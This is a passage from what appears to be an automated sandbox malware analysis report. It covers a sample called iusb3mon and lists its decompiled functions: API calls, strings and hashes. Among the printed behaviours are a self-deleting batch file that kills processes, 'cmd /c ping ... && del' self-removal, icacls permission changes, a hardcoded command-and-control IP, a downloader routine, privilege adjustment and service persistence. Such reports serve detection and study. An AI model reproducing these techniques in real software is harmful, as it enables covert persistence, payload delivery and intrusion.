                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06243E1B
                                                                                                                      • Part of subcall function 06242A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06242661,c:\inst.ini), ref: 06242A2B
                                                                                                                      • Part of subcall function 06242A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06242661,c:\inst.ini), ref: 06242A40
                                                                                                                      • Part of subcall function 06242A15: CloseHandle.KERNEL32(00000000,?,06242661,c:\inst.ini), ref: 06242A4D
                                                                                                                    • Sleep.KERNEL32(c:\del,?,?), ref: 06243E38
                                                                                                                      • Part of subcall function 062429CE: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,75920F00,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062429E4
                                                                                                                      • Part of subcall function 062429CE: WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062429FC
                                                                                                                      • Part of subcall function 062429CE: CloseHandle.KERNEL32(00000000,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06242A09
                                                                                                                    • Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06243E4B
                                                                                                                    • WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 06243E53
                                                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 06243E5A
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 06243E6A
                                                                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 06243E83
                                                                                                                    • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 06243E9A
                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?,?), ref: 06243EB7
                                                                                                                    • GetCurrentProcess.KERNEL32(00000100,?,?,?,?,?,?,?,?), ref: 06243F32
                                                                                                                    • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06243F3F
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06243F43
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06243F50
                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 06243F69
                                                                                                                    • SetPriorityClass.KERNEL32(?,00000040,?,?,?,?,?,?,?,?), ref: 06243F78
                                                                                                                    • SetThreadPriority.KERNEL32(?,000000F1,?,?,?,?,?,?,?,?), ref: 06243F7F
                                                                                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 06243F84
                                                                                                                    • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?), ref: 06243F94
                                                                                                                    • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06243F9B
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06243F9E
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06243FA5
                                                                                                                    • ExitProcess.KERNEL32 ref: 06243FA8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$PriorityThread$CurrentProcess$ClassCreateExecSleep$CloseHandleNameWrite$AttributesDeleteEnvironmentExitModulePathResumeShortVariable
                                                                                                                    • String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$C:\ProgramData\Microsoft\del.bat$COMSPEC$D$c:\del$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone"
                                                                                                                    • API String ID: 1606893727-1022896001
                                                                                                                    • Opcode ID: 3cba29ba3626db3db00be31b7f755177cae880b213bd111eb003f9c13fae2c99
                                                                                                                    • Instruction ID: 2624fdb7cd76a2f0135bc1365c1a62b2791445982df51527956b32e7edf2bca5
                                                                                                                    • Opcode Fuzzy Hash: 3cba29ba3626db3db00be31b7f755177cae880b213bd111eb003f9c13fae2c99
                                                                                                                    • Instruction Fuzzy Hash: 89418972951319BAEBA0ABE2EC8DEDF7B6CEF84740F010451F655E2480DA709B84CF61
                                                                                                                    Function 0624510D Relevance: 54.5, APIs: 23, Strings: 8, Instructions: 287registrystringsynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06245112
                                                                                                                    • wsprintfA.USER32 ref: 06245148
                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 0624515A
                                                                                                                    • GetLastError.KERNEL32 ref: 06245166
                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 06245174
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0624517B
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Console,00000000,00020019,?), ref: 062451D2
                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Groupfenzhu,00000000,?,00000000,?), ref: 062451F3
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06245210
                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Remarkbeizhu,00000000,?,00000000,?), ref: 06245228
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06245245
                                                                                                                    • RegQueryValueExA.ADVAPI32(?,MarkTime,00000000,?,00000000,?), ref: 0624525D
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0624526D
                                                                                                                    • _rand.LIBCMT ref: 06245288
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 06245292
                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 06245347
                                                                                                                    • lstrcatA.KERNEL32(00000000,202.79.169.178), ref: 06245370
                                                                                                                    • strcmp.MSVCRT ref: 06245382
                                                                                                                    • GetTickCount.KERNEL32 ref: 06245397
                                                                                                                    • GetTickCount.KERNEL32 ref: 062453B3
                                                                                                                    • lstrcpyA.KERNEL32(06272AD4,?,?,?,00006365,00000000), ref: 062453ED
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,?), ref: 0624543F
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0624544C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$QueryValue$CountMutexSleepTicklstrcat$CreateErrorH_prologHandleLastObjectOpenReleaseSingleWait_randlstrcpystrcmpwsprintf
                                                                                                                    • String ID: %s:%d:%s$202.79.169.178$Console$Default$Groupfenzhu$MarkTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\
                                                                                                                    • API String ID: 2892932112-3094769979
                                                                                                                    • Opcode ID: d40f165ddabe8899093bedc45fe6431cd7f5f30d4d6898108c5a0994125fcb04
                                                                                                                    • Instruction ID: d826079f0bcd3d9b4aeea8e3db782559202f884a42a56ac96f9460b85c78f07c
                                                                                                                    • Opcode Fuzzy Hash: d40f165ddabe8899093bedc45fe6431cd7f5f30d4d6898108c5a0994125fcb04
                                                                                                                    • Instruction Fuzzy Hash: 9EA1A372D2425AABDBA5FBB1DD48EEE7B7DAF04344F100166FA45B2040DB709A84CF61
                                                                                                                    Function 06244FA7 Relevance: 43.8, APIs: 3, Strings: 22, Instructions: 81stringtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?,7508EA50), ref: 06244FB5
                                                                                                                    • wsprintfA.USER32 ref: 06245056
                                                                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 0624508C
                                                                                                                      • Part of subcall function 06249423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,0626CB7A,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001,0626CB7A), ref: 06249450
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06249467
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06249472
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 0624947D
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06249488
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06249493
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0624949E
                                                                                                                      • Part of subcall function 06249423: FreeLibrary.KERNEL32(00000000,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001), ref: 06249592
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoadLocalTimelstrlenwsprintf
                                                                                                                    • String ID: $%$%$%$%$%4d-$-$.$.$.$.$2$2$2$2$:$Console$MarkTime$d$d$d$d
                                                                                                                    • API String ID: 1129135643-4086575212
                                                                                                                    • Opcode ID: cbf5ad9fe148bcacba721b8e460ac1a9929cdbf618a12553ef1be4e22ad231b7
                                                                                                                    • Instruction ID: bf3f51f23cf97c3359cc3718538ff368d48037b9e3bc2750bcdc5fb9d4361c7f
                                                                                                                    • Opcode Fuzzy Hash: cbf5ad9fe148bcacba721b8e460ac1a9929cdbf618a12553ef1be4e22ad231b7
                                                                                                                    • Instruction Fuzzy Hash: 83411F61C083D8E9EB12D7E8D80C7DEBFF91B15708F0440C5E584BA182D6BA4758C776
                                                                                                                    Function 06246316 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 169filelibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteFileA.KERNEL32(?,062444DD,00000000,00000001), ref: 06246344
                                                                                                                    • LoadLibraryA.KERNEL32(wininet.dll), ref: 06246357
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0624636E
                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0624638E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 0624639A
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062463BC
                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 062463D9
                                                                                                                    • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 06246409
                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 06246496
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062464A8
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 062464B3
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 062464BF
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062464D2
                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 062464E3
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062464F3
                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 06246500
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AddressProc$Library$CloseDeleteFreeHandle$ConnectCopyCreateInternetLoadSleepWrite
                                                                                                                    • String ID: %s1$404$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                                    • API String ID: 1518507476-3861321592
                                                                                                                    • Opcode ID: 09e38aa438ef853368defadc9d4f72175d9a526b8c07db8efea54389a4a1fc5a
                                                                                                                    • Instruction ID: b4e165b7c6c6b240dc781561ac356e6ef13575e4bc1885e45e180fc676501135
                                                                                                                    • Opcode Fuzzy Hash: 09e38aa438ef853368defadc9d4f72175d9a526b8c07db8efea54389a4a1fc5a
                                                                                                                    • Instruction Fuzzy Hash: 935171B291021EBFEF64ABA1DC89DEE7B7DEF04654F104466FA05E2050DA709F819F60
                                                                                                                    Function 06248FF7 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 84libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624900F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0624901F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0624902A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06249035
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624903F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0624904A
                                                                                                                    • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06249092
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0624909A
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062490A9
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062490BA
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062490C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                                                                                    • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                                                                                                                    • API String ID: 2887716753-2040270271
                                                                                                                    • Opcode ID: 25fe54aa7b96dd41c72f13be22feedae0cab5cf90153d532a85ef5e6d246020b
                                                                                                                    • Instruction ID: 93e97b02733983823f6db6e923ac1435ae38385956af64fe74b8e4202dcad843
                                                                                                                    • Opcode Fuzzy Hash: 25fe54aa7b96dd41c72f13be22feedae0cab5cf90153d532a85ef5e6d246020b
                                                                                                                    • Instruction Fuzzy Hash: 11217C71D5431ABADB10ABF69C89EEFBFB8EF08600F014455F940E2140DAB49A85CFA1
                                                                                                                    Function 062458AD Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 116sleepregistryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegisterServiceCtrlHandlerA.ADVAPI32(0626CA80,062459C2), ref: 062458C3
                                                                                                                    • SetServiceStatus.ADVAPI32(00000000,06273118), ref: 06245913
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06245921
                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 06245938
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118), ref: 06245958
                                                                                                                      • Part of subcall function 0624571E: CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,202.79.169.178,0626CC34,06246CAB), ref: 06245729
                                                                                                                      • Part of subcall function 0624571E: GetLastError.KERNEL32 ref: 06245731
                                                                                                                      • Part of subcall function 0624571E: CloseHandle.KERNEL32(00000000), ref: 0624573F
                                                                                                                    • Sleep.KERNEL32(0000003C), ref: 06245961
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06245977
                                                                                                                    • wsprintfA.USER32 ref: 06245990
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 062459A6
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118), ref: 062459B9
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118,06273118,750904E0,00000001,00000000), ref: 062459FF
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06245A06
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118), ref: 06245A20
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118,06273118,750904E0,00000001,00000000), ref: 06245A43
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06245A4A
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118,06273118,750904E0,00000001,00000000), ref: 06245A7E
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06245A85
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$Status$Sleep$CloseHandle$CreateCtrlErrorFileHandlerLastModuleMutexNameRegisterVersionwsprintf
                                                                                                                    • String ID: %s Win7
                                                                                                                    • API String ID: 2853745164-511819196
                                                                                                                    • Opcode ID: 20bce57d8ae736802878b97240a3f7722d398e9b964ccac37134f5fd49ac3875
                                                                                                                    • Instruction ID: dde0d44babbb3b4651b742ab2bceb0641add3a32ba76bce522d2f95e97ec7bdd
                                                                                                                    • Opcode Fuzzy Hash: 20bce57d8ae736802878b97240a3f7722d398e9b964ccac37134f5fd49ac3875
                                                                                                                    • Instruction Fuzzy Hash: D441A370510315AFE750EF61FC4EF967BBAFB05719F004059E788A6188CBB54644DFA2
                                                                                                                    Function 0625956B Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0625C82F: TlsGetValue.KERNEL32(00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?,?,00000100), ref: 0625C86E
                                                                                                                    • CallNextHookEx.USER32(?,00000003,?,?), ref: 06259595
                                                                                                                    • GetClassLongA.USER32(?,000000E6), ref: 062595DC
                                                                                                                    • GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,?,0625C4D2), ref: 06259608
                                                                                                                    • lstrcmpiA.KERNEL32(?,ime), ref: 06259617
                                                                                                                    • GetWindowLongA.USER32(?,000000FC), ref: 0625968A
                                                                                                                    • SetWindowLongA.USER32(?,000000FC,00000000), ref: 062596AB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                                                                                                    • String ID: AfxOldWndProc423$ime
                                                                                                                    • API String ID: 3731301195-104836986
                                                                                                                    • Opcode ID: 042531add3ca4f754ee3028d51b395ad4eca7072d3a897ab306a97d17b7ac4de
                                                                                                                    • Instruction ID: 62c913622c1d59d012bf96e88a19297337c926b9ad58a26bc8c06f1ab7b79f80
                                                                                                                    • Opcode Fuzzy Hash: 042531add3ca4f754ee3028d51b395ad4eca7072d3a897ab306a97d17b7ac4de
                                                                                                                    • Instruction Fuzzy Hash: BC518B71D20356EBCB719F64DC48BAE3BA9BF04261F124654FD55AA190DB30DA84CF90
                                                                                                                    Function 06249423 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 144libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,0626CB7A,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001,0626CB7A), ref: 06249450
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06249467
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06249472
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 0624947D
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06249488
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06249493
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0624949E
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001), ref: 06249592
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                    • String ID: ADVAPI32.dll$Console$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
                                                                                                                    • API String ID: 2449869053-4282833508
                                                                                                                    • Opcode ID: c1d09b02beb8542c05399b031902a655f6450bb50abd8ccf516b5f21368507f9
                                                                                                                    • Instruction ID: e57ec10c011f3e8e9b8fdf08d9c826e12b351ecd93c63d767b36e76c0c623c76
                                                                                                                    • Opcode Fuzzy Hash: c1d09b02beb8542c05399b031902a655f6450bb50abd8ccf516b5f21368507f9
                                                                                                                    • Instruction Fuzzy Hash: C7416871D2021EBFEF55AF94DC84EBFBB79EB08651F104025FE24A2060D7708990DBA0
                                                                                                                    Function 062491B3 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 183libraryloaderstringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                    • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                    • GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                    • GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                    • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                    • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493CF
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
